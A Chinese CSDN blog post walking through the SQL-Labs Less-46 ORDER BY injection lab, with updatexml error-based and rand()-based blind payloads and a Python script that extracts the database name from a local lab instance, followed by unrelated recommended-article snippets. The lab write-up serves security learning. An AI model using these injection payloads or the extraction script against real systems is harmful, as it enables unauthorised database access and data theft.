SQLlabs46关

已于 2024-02-26 17:05:04 修改
阅读量937 收藏 14
点赞数 15
文章标签: 运维 网络
于 2024-02-26 17:03:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxy9298/article/details/136303802
版权
文章讲述了如何通过使用`rand()`函数进行SQL注入,实现盲注和报错注入,以获取数据库信息。作者给出了一个Python脚本,通过构造payload对特定字段进行排序,从而判断并提取敏感信息。
摘要由CSDN通过智能技术生成

源码:

如果我们直接用列去排序

?sort=username/password

username:

passward:

可以看到顺序是不同的,当然第一列第二列第三列也可以,基本上都是这个原理,那怎么去实现注入呢,我们主要是通过rand()去实现一个盲注或者报错注入(如果打印报错)

报错注入;真的走第一个错的走第二个我们想走第二个,这样就可以实现

?sort=updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1)

那如果是盲注的话,写true和false排序是不同的,所有我们可不可以用rand去进行排序

?sort=rand(ascii(mid((select%20database()),1,1))>114)

我们通过找第一个字段,来爬取判断,为真的话是admin3,因为布尔true=3

# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/25 16:31
@version: 1.0
"""
import requests
import time
from bs4 import BeautifulSoup
 
 
"""
查表名
查列名
查具体字段内容
if(ascii(substr(database(),1,1))>100,%20sleep(3),%200)--+
if(ascii(substr(database(),1,1))>110, sleep(3), 0)
"""
def inject_database(url):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
            res = {"sort": payload}
            r = requests.post(url, params=res)
            html = r.text
            soup = BeautifulSoup(html,'html.parser')
            getUsername = soup.find_all('td')[1].text
            if getUsername == 'admin3':
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
 
if __name__ == "__main__":
    url = 'http://127.0.0.1/sqli/Less-46/index.php'
    inject_database(url)

猛踹瘸子那条好腿Σ(っ °Д °;)っ
关注
  • 15
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql-labs通技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sql-labs
03-07
"SQL-Labs" 是一个可能的数据库学习平台或者是一系列SQL练习题目集合,主要用于帮助用户提升SQL查询和数据处理技能。由于没有具体的标签提供更多信息,我们可以假设这是一个综合性的SQL实践项目,涵盖了各种SQL语言...
sql-labs第46 order by盲注
ytdd66的博客
02-26 1227
来到了第46进入卡发现让我们输入的参数为sort,我们输入?sort=1尝试:输入?sort=2,3,发现表格按照顺序进行排列输出,明显是使用了order by相的函数。我们将参数变成1'进行尝试,就会报错:查看源码:通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入:分别显示升序和降序的表格,说明此处是注入点,即注入点在order by后的参数中,而order by不同于在where后的注入,不能使用union等进行注入。
sql-labs闯46~53
qq_44663230的博客
09-10 1223
sql-labs46~53 order by 排序注入
SQL-Labs46order by注入
weixin_63497480的博客
02-27 442
可以看出按照字母顺序进行了排序,所以它是一个使用了order by语句进行排序的查询的一种查询输出方式。从URL中可以看出传参的参数为SORT,下面我们令参数即sort为1继续尝试输入:?爆出数据库users表中的所有列。
SQL-Labs46order by注入姿势
热门推荐
钟言的博客
02-24 1万+
SQL-Labs的第46,order by注入,本篇以多种方法可以通,详细内容包含了四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 7、盲注脚本等内容
sqlilabs 75中文目录
01-11
SQLiLabs是一个专门用于学习和练习SQL注入技术的在线靶场。这个中文目录旨在为那些对英语不熟悉的学习者提供清晰的指引,使他们能够更好地理解和实践SQL注入的各种类型。 1. **基于错误的注入**:在Less-1到Less-4...
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
Apollo使用(3):分布式docker部署
游王子的博客
07-24 718
Apollo 1.7.0版本开始会默认上传Docker镜像到,可以按照如下步骤获取。
使用易备数据备份软件,践行虚拟机最佳备份方案
sanyuan7783的博客
07-26 915
新的键业务应用程序有助于为容器和容器化工作负载赋予更大动力。但是,在可预见的未来,虚拟机的应用仍会普遍存在。容器和虚拟机可以很好地协同工作,适用于大多数键的 IT 基础设施。因此,备份虚拟机及其包含的数据、服务和应用程序仍然是企业至重要的任务。本文以 VMware vSphere 虚拟机为例,介绍虚拟机备份的最佳实践方法。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 848
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
IT运维必备神器!PsShutdown,定时机重启一键搞定!
最新发布
weixin_39410685的博客
07-30 478
下次见,我们后会有期!当你坐在电脑前,手指轻轻敲几下键盘,就能实现定时任务,无论是机、重启,还是注销用户,甚至是锁屏,都尽在掌握之中;别急,咱们先不聊那些冷冰冰的功能参数,来聊聊它背后的故事这个名字听起来就带着一股子神秘感,它出自Sysinternals这个大名鼎鼎的宝库,那可是微软旗下的技术大佬们的智慧结晶啊。而且哦,这款工具的使用体验简直不要太友好,不需要繁琐的安装过程,只需要简单几步,就能让它成为你电脑里的得力助手;无论你是IT界的老司机,还是刚入门的小白,都能轻松上手,享受它带来的便捷与高效;
Docker容器下面home assistant忘记账号密码怎么重置?
玩人工智能的辣条哥的博客
07-30 161
docker ha。
微软:警惕利用VMware ESXi进行身份验证绕过攻击
FreeBuf_的博客
07-30 298
到目前为止,该漏洞已被被追踪为 Storm-0506、Storm-1175、Octo Tempest 和 Manatee Tempest 的勒索软件运营商在野外利用,并在攻击中部署了Akira和Black Basta勒索软件。虽然成功实施攻击需要对目标设备和用户交互具有高权限,但微软表示,已有几个勒索软件团伙利用漏洞完全掌控了管理员权限,窃取存储在托管虚拟机上的敏感数据,在受害者的网络中横向移动,并加密 ESXi 虚拟机管理程序的文件系统。以Storm-0506为例的ESXi 攻击链。
AccessLog| 一款开源的日志分析系统
ClkLog的博客
07-26 499
系统采用Java语言、搭配OLAP数据库,涵盖基本web日志分析,同时提供性能分析,帮助高效运维
Linux 普通用户启动Nginx使用80端口,小于1024的端口
y393016244的博客
07-26 132
在root用户下执行。
vmware 设置ip
一路向前
07-30 529
上面操作都是用root身份进行操作的。一步一步操作下来,应该问题不大,注意手动配置ip那边是xshell连接的ip
sql labs安装
09-10
要在CSDN上安装SQL Labs,您可以按照以下步骤进行操作: 1. 首先,确保您的CSDN账号已经登录。 2. 在CSDN的主页上,点击顶部导航栏中的“下载”按钮。 3. 在下载页面中,使用搜索框输入“SQL Labs”来查找该插件。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值